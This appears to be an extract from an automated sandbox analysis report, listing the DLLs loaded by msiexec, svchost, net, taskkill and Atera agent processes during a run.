                                Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: usp10.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cabinet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
